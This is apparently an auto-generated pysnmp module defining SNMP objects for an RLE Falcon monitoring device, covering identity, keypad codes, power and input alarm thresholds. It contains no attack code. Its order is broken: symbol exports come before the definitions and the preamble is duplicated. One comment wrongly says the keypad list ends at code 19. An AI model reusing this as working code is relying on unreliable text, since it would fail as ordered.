falconInput3Delay=falconInput3Delay, falconInput6=falconInput6, falconInput13Delay=falconInput13Delay, 
falconKeypadName1=falconKeypadName1, falconInput5Label=falconInput5Label, falconInput19Delay=falconInput19Delay, falconInput5HighAlarm=falconInput5HighAlarm, falconKeypadCode13=falconKeypadCode13, falconInput18Label=falconInput18Label, falconAlarmEntryAdded=falconAlarmEntryAdded, falconInput7Low2Alarm=falconInput7Low2Alarm, falconInput7LowAlarm=falconInput7LowAlarm, falconKeypadCode15=falconKeypadCode15, falconOnBatteryAlarm=falconOnBatteryAlarm, falconInput2Gain=falconInput2Gain, falconInput12DigAlarm=falconInput12DigAlarm, falconInput18RlyControl=falconInput18RlyControl, falconKeypadCode1=falconKeypadCode1, falconPersistantTraps=falconPersistantTraps, falconInput4LowAlarm=falconInput4LowAlarm, falconInput17Label=falconInput17Label, falconKeypadCode18=falconKeypadCode18, falconKeypadName12=falconKeypadName12, falconInput1State=falconInput1State, falconInput6Gain=falconInput6Gain, falconInput10DigAlarm=falconInput10DigAlarm, falconKeypadName15=falconKeypadName15, falconInput9DigAlarm=falconInput9DigAlarm, falconKeypadCode5=falconKeypadCode5, falconInput13State=falconInput13State, falconInput12Delay=falconInput12Delay, falconRelay2Time=falconRelay2Time, falconClock=falconClock, falconIdentModel=falconIdentModel, falconIdentSoftwareVersion=falconIdentSoftwareVersion, falconInput4Delay=falconInput4Delay, falconInput4Reading=falconInput4Reading, falconRelay1State=falconRelay1State, falconInput17DigAlarm=falconInput17DigAlarm, falconRelay3Time=falconRelay3Time, falconInput7UOM=falconInput7UOM, falconInput14Reading=falconInput14Reading, falconInput10RlyControl=falconInput10RlyControl, falconInput7State=falconInput7State, falconInput3DigAlarm=falconInput3DigAlarm, falconRelay2Label=falconRelay2Label, falconInput3LowLimit=falconInput3LowLimit, falcon8124=falcon8124, falconRelay6State=falconRelay6State, falconAlarmEntryRemoved=falconAlarmEntryRemoved, falconKeypadName8=falconKeypadName8, falconAlarmHistoryId=falconAlarmHistoryId, falconOutputs=falconOutputs, 
falconInput2HighLimit2=falconInput2HighLimit2, falconInput4DigAlarm=falconInput4DigAlarm, falconInput8Low2Alarm=falconInput8Low2Alarm, falconInput7Reading=falconInput7Reading, falconInput10Reading=falconInput10Reading, falconRelay5Label=falconRelay5Label, falconInput2LowLimit=falconInput2LowLimit, falconInput3LowAlarm=falconInput3LowAlarm, falconInput1Gain=falconInput1Gain, falconInput3HighLimit=falconInput3HighLimit, falconInputVoltage=falconInputVoltage, falconKeypadName11=falconKeypadName11, falconInput5High2Alarm=falconInput5High2Alarm, falconInput3Hysteresis=falconInput3Hysteresis, falconInput3State=falconInput3State, falconInput8UOM=falconInput8UOM, falconInput1RlyControl=falconInput1RlyControl, falconRelay4Label=falconRelay4Label, falconInput3Reading=falconInput3Reading, falconRelay3Label=falconRelay3Label, falconAlarmsPresent=falconAlarmsPresent, falconInput4Low2Alarm=falconInput4Low2Alarm, falconMIB=falconMIB, falconKeypadName16=falconKeypadName16, falconInput13=falconInput13, falconInput5HighLimit2=falconInput5HighLimit2, products=products, falconInput7High2Alarm=falconInput7High2Alarm, falconInput16=falconInput16, falconInput4LowLimit2=falconInput4LowLimit2, falconInput11RlyControl=falconInput11RlyControl, falconInput12=falconInput12, falconInput20Label=falconInput20Label, falconKeypad=falconKeypad, falconInput6RlyControl=falconInput6RlyControl, falconRelay2=falconRelay2, falconInput1HighAlarm=falconInput1HighAlarm, falconInput2=falconInput2, falconRelay4State=falconRelay4State, falconIdent=falconIdent, falconInput12State=falconInput12State, falconInput16State=falconInput16State, falconInput8Hysteresis=falconInput8Hysteresis, falconInput11DigAlarm=falconInput11DigAlarm, falconInput18Delay=falconInput18Delay, falconKeypadCode4=falconKeypadCode4, falconInput2High2Alarm=falconInput2High2Alarm, falconInput3=falconInput3, falconInput8State=falconInput8State, falconInput11=falconInput11, falconInput19RlyControl=falconInput19RlyControl, 
falconInput8High2Alarm=falconInput8High2Alarm, falconKeypadName5=falconKeypadName5, falconKeypadName14=falconKeypadName14, falconInput1=falconInput1, falconInput8RlyControl=falconInput8RlyControl)
mibBuilder.exportSymbols("RLE-FALCON-MIB", falconInput7LowLimit2=falconInput7LowLimit2, falconRelay4=falconRelay4, falconInput19DigAlarm=falconInput19DigAlarm, falconKeypadName7=falconKeypadName7, falconAlarmEntry=falconAlarmEntry, falconInput14=falconInput14, falconAlarmHistoryTable=falconAlarmHistoryTable, falconInput3RlyControl=falconInput3RlyControl, falconRelay2State=falconRelay2State, falconAlarms=falconAlarms, falconInput6Low2Alarm=falconInput6Low2Alarm, falconInput1HighLimit=falconInput1HighLimit, falconOnBattery=falconOnBattery, falconKeypadCode3=falconKeypadCode3, falconInput4State=falconInput4State, falconInput2Low2Alarm=falconInput2Low2Alarm, falconInput9Reading=falconInput9Reading, falconInput9State=falconInput9State, falconInput4=falconInput4, falconInput9RlyControl=falconInput9RlyControl, falconInput2LowAlarm=falconInput2LowAlarm, falconKeypadName20=falconKeypadName20, falconInput3UOM=falconInput3UOM, falconInput18State=falconInput18State, falconKeypadCode11=falconKeypadCode11, falconLowBatteryAlarm=falconLowBatteryAlarm, falconInput6HighAlarm=falconInput6HighAlarm, falconAlarmHistoryEntries=falconAlarmHistoryEntries, falconKeypadName13=falconKeypadName13, falconInput20Reading=falconInput20Reading, falconInput6HighLimit2=falconInput6HighLimit2, falconInput7HighAlarm=falconInput7HighAlarm, falconInput5LowLimit2=falconInput5LowLimit2, falconInput8DigAlarm=falconInput8DigAlarm, falconRelay5Status=falconRelay5Status, falconInput3Gain=falconInput3Gain, falconInput8LowLimit2=falconInput8LowLimit2, falconInput8Delay=falconInput8Delay, falconInput17Delay=falconInput17Delay, falconRelay6Time=falconRelay6Time, falconInput2Label=falconInput2Label, falconKeypadCode20=falconKeypadCode20, falconInput19Label=falconInput19Label, falconInput15State=falconInput15State, falconInput1Offset=falconInput1Offset, falconInput5LowAlarm=falconInput5LowAlarm, falconInput12Label=falconInput12Label, falconInput13DigAlarm=falconInput13DigAlarm, 
falconInput17Reading=falconInput17Reading, falconIdentSpecific=falconIdentSpecific, falconInput20=falconInput20, falconInput6Offset=falconInput6Offset, falconAlarmHistoryText=falconAlarmHistoryText, falconDoorAlarmBypass=falconDoorAlarmBypass, falconInput6High2Alarm=falconInput6High2Alarm, falconInput1Hysteresis=falconInput1Hysteresis, falconRelay1Status=falconRelay1Status, falconKeypadName4=falconKeypadName4, falconInput4HighAlarm=falconInput4HighAlarm, falconInput5=falconInput5, falconInput15RlyControl=falconInput15RlyControl, falconRelay1=falconRelay1, falconInput3Offset=falconInput3Offset, falconRelay4Time=falconRelay4Time, falconRelay3Status=falconRelay3Status, falconAlarmTable=falconAlarmTable, falconInput15Reading=falconInput15Reading, falconInput9Delay=falconInput9Delay, falconInput1High2Alarm=falconInput1High2Alarm, falconInput4Label=falconInput4Label, falconAlarmDescr=falconAlarmDescr, falconInput3HighLimit2=falconInput3HighLimit2, falconInput18DigAlarm=falconInput18DigAlarm, falconInput11Label=falconInput11Label, falconInput19=falconInput19, falconInput7HighLimit2=falconInput7HighLimit2, falconKeypadCode9=falconKeypadCode9, falconInput8HighLimit=falconInput8HighLimit, falconInput1HighLimit2=falconInput1HighLimit2, falconKeypadCode6=falconKeypadCode6, falconKeypadName6=falconKeypadName6, falconInput1Label=falconInput1Label, falconRelay1Time=falconRelay1Time, falconRelay6=falconRelay6, falconAccessDenied=falconAccessDenied, falconInput3Label=falconInput3Label, falconInput14DigAlarm=falconInput14DigAlarm, rle=rle, falconInput2Offset=falconInput2Offset, falconInput2LowLimit2=falconInput2LowLimit2, falconInput5LowLimit=falconInput5LowLimit, falconInput16Delay=falconInput16Delay, falconInput8=falconInput8, falconInput15Delay=falconInput15Delay, falconInput9=falconInput9, falconRelay2Status=falconRelay2Status)
# NOTE(review): a stray non-Python line (table-formatted metadata residue,
# likely from a file-concatenation/extraction step) was found here; it was a
# syntax error and has been replaced by this comment.  The statements below
# re-declare the module preamble and look like a duplicated copy of the
# file — confirm against the upstream generated RLE-FALCON-MIB module.
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection")
TruthValue, PositiveInteger = mibBuilder.importSymbols("RFC1253-MIB", "TruthValue", "PositiveInteger")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Counter64, TimeTicks, NotificationType, ModuleIdentity, Counter32, Integer32, Bits, ObjectIdentity, enterprises, Gauge32, Unsigned32, IpAddress, NotificationType, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Counter64", "TimeTicks", "NotificationType", "ModuleIdentity", "Counter32", "Integer32", "Bits", "ObjectIdentity", "enterprises", "Gauge32", "Unsigned32", "IpAddress", "NotificationType", "MibIdentifier")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
# --- Enterprise OID roots ------------------------------------------------
# RLE Technologies' private-enterprise arc (1.3.6.1.4.1.3184) down to the
# Falcon product's MIB root.  Auto-generated pysnmp code: do not edit the
# OID tuples or statement order by hand.
rle = MibIdentifier((1, 3, 6, 1, 4, 1, 3184))
products = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1))
falcon = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1))
falconMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1))
# --- Device identification (OID ...3184.1.1.1.1) -------------------------
# Read-only manufacturer/model/firmware strings plus a pointer OID.
falconIdent = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1))
falconIdentManufacturer = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentManufacturer.setStatus('mandatory')
falconIdentModel = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentModel.setStatus('mandatory')
falconIdentSoftwareVersion = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentSoftwareVersion.setStatus('mandatory')
falconIdentSpecific = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 4), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentSpecific.setStatus('mandatory')
# --- System settings (OID ...3184.1.1.1.2) -------------------------------
falconSystem = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2))
falconClock = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconClock.setStatus('mandatory')
falconDoorAlarmBypass = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconDoorAlarmBypass.setStatus('mandatory')
# --- Keypad (OID ...3184.1.1.1.2.3) --------------------------------------
# Paired read-write access-code and user-name scalars; code N at sub-OID
# 2*N-1, name N at sub-OID 2*N.  (This chunk ends at code 19; the pattern
# presumably continues past the visible lines.)
falconKeypad = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3))
falconKeypadCode1 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode1.setStatus('mandatory')
falconKeypadName1 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 2), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName1.setStatus('mandatory')
falconKeypadCode2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode2.setStatus('mandatory')
falconKeypadName2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 4), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName2.setStatus('mandatory')
falconKeypadCode3 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode3.setStatus('mandatory')
falconKeypadName3 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName3.setStatus('mandatory')
falconKeypadCode4 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 7), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode4.setStatus('mandatory')
falconKeypadName4 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 8), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName4.setStatus('mandatory')
falconKeypadCode5 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 9), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode5.setStatus('mandatory')
falconKeypadName5 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 10), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName5.setStatus('mandatory')
falconKeypadCode6 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 11), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode6.setStatus('mandatory')
falconKeypadName6 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 12), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName6.setStatus('mandatory')
falconKeypadCode7 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 13), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode7.setStatus('mandatory')
falconKeypadName7 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 14), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName7.setStatus('mandatory')
falconKeypadCode8 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 15), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode8.setStatus('mandatory')
falconKeypadName8 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 16), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName8.setStatus('mandatory')
falconKeypadCode9 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 17), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode9.setStatus('mandatory')
falconKeypadName9 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 18), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName9.setStatus('mandatory')
falconKeypadCode10 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 19), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode10.setStatus('mandatory')
falconKeypadName10 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 20), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName10.setStatus('mandatory')
falconKeypadCode11 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 21), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode11.setStatus('mandatory')
falconKeypadName11 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 22), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName11.setStatus('mandatory')
falconKeypadCode12 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 23), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode12.setStatus('mandatory')
falconKeypadName12 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 24), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName12.setStatus('mandatory')
falconKeypadCode13 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 25), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode13.setStatus('mandatory')
falconKeypadName13 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 26), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName13.setStatus('mandatory')
falconKeypadCode14 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 27), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode14.setStatus('mandatory')
falconKeypadName14 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 28), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName14.setStatus('mandatory')
falconKeypadCode15 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 29), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode15.setStatus('mandatory')
falconKeypadName15 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 30), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName15.setStatus('mandatory')
falconKeypadCode16 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 31), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode16.setStatus('mandatory')
falconKeypadName16 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 32), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName16.setStatus('mandatory')
falconKeypadCode17 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 33), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode17.setStatus('mandatory')
falconKeypadName17 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 34), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName17.setStatus('mandatory')
falconKeypadCode18 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 35), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode18.setStatus('mandatory')
falconKeypadName18 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 36), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName18.setStatus('mandatory')
falconKeypadCode19 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 37), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode19.setStatus('mandatory')
falconKeypadName19 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 38), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName19.setStatus('mandatory')
falconKeypadCode20 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 39), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode20.setStatus('mandatory')
falconKeypadName20 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 40), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName20.setStatus('mandatory')
# --- Power-supply / analog-sampling scalars (...3184.1.1.1.2.4-7) ---

# Measured input supply voltage; read-only, full Integer32 range.
falconInputVoltage = MibScalar(
    (1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 4),
    Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))
).setMaxAccess("readonly")
if mibBuilder.loadTexts:
    falconInputVoltage.setStatus('mandatory')

# Battery presence flag: notInstalled(0) / installed(1); writable.
falconOnBattery = MibScalar(
    (1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 5),
    Integer32().subtype(
        subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))
    ).clone(namedValues=NamedValues(("notInstalled", 0), ("installed", 1)))
).setMaxAccess("readwrite")
if mibBuilder.loadTexts:
    falconOnBattery.setStatus('mandatory')

# Low-battery alarm threshold; writable, full Integer32 range.
falconLowBatteryThreshold = MibScalar(
    (1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 6),
    Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))
).setMaxAccess("readwrite")
if mibBuilder.loadTexts:
    falconLowBatteryThreshold.setStatus('mandatory')

# Analog averaging window, 0-60; writable.
falconAnalogAverage = MibScalar(
    (1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 7),
    Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 60))
).setMaxAccess("readwrite")
if mibBuilder.loadTexts:
    falconAnalogAverage.setStatus('mandatory')
falconInputs = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3))
# --- falconInput1 (...3184.1.1.1.3.1): universal input #1 ---
# Leaf layout: 1 State, 2 Reading (read-only), 3 Gain, 4 Offset,
# 5 Label, 6 UOM, 7 HighLimit2, 8 HighLimit, 9 LowLimit, 10 LowLimit2,
# 11 RlyControl, 12 Delay (0-600), 13 Hysteresis (>= 0).
falconInput1 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1))
# Input mode selector.
# NOTE(review): the enum label "notinstalled" here is all lower case,
# while inputs 3 onward spell it "notInstalled" — presumably a typo in
# the source MIB; confirm against the vendor MIB before normalising.
falconInput1State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notinstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1State.setStatus('mandatory')
# Current (scaled) reading of the input; read-only.
falconInput1Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput1Reading.setStatus('mandatory')
# Calibration: gain and offset applied to the raw reading.
falconInput1Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Gain.setStatus('mandatory')
falconInput1Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Offset.setStatus('mandatory')
# Free-text label and unit-of-measure strings.
falconInput1Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Label.setStatus('mandatory')
falconInput1UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1UOM.setStatus('mandatory')
# Alarm limit pairs (two high, two low thresholds).
falconInput1HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1HighLimit2.setStatus('mandatory')
falconInput1HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1HighLimit.setStatus('mandatory')
falconInput1LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1LowLimit.setStatus('mandatory')
falconInput1LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1LowLimit2.setStatus('mandatory')
# Relay-control word, alarm delay (seconds, 0-600) and hysteresis.
falconInput1RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1RlyControl.setStatus('mandatory')
falconInput1Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Delay.setStatus('mandatory')
falconInput1Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Hysteresis.setStatus('mandatory')
# --- falconInput2 (...3184.1.1.1.3.2): universal input #2 ---
# Same leaf layout as the other universal inputs: 1 State, 2 Reading
# (read-only), 3 Gain, 4 Offset, 5 Label, 6 UOM, 7 HighLimit2,
# 8 HighLimit, 9 LowLimit, 10 LowLimit2, 11 RlyControl,
# 12 Delay (0-600), 13 Hysteresis (>= 0).
falconInput2 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2))
# NOTE(review): enum label "notinstalled" is all lower case here, while
# inputs 3 onward spell it "notInstalled" — presumably a typo in the
# source MIB; confirm against the vendor MIB before normalising.
falconInput2State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notinstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2State.setStatus('mandatory')
# Current (scaled) reading; read-only.
falconInput2Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput2Reading.setStatus('mandatory')
# Calibration gain/offset.
falconInput2Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Gain.setStatus('mandatory')
falconInput2Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Offset.setStatus('mandatory')
# Free-text label and unit-of-measure strings.
falconInput2Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Label.setStatus('mandatory')
falconInput2UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2UOM.setStatus('mandatory')
# Alarm limit pairs (two high, two low thresholds).
falconInput2HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2HighLimit2.setStatus('mandatory')
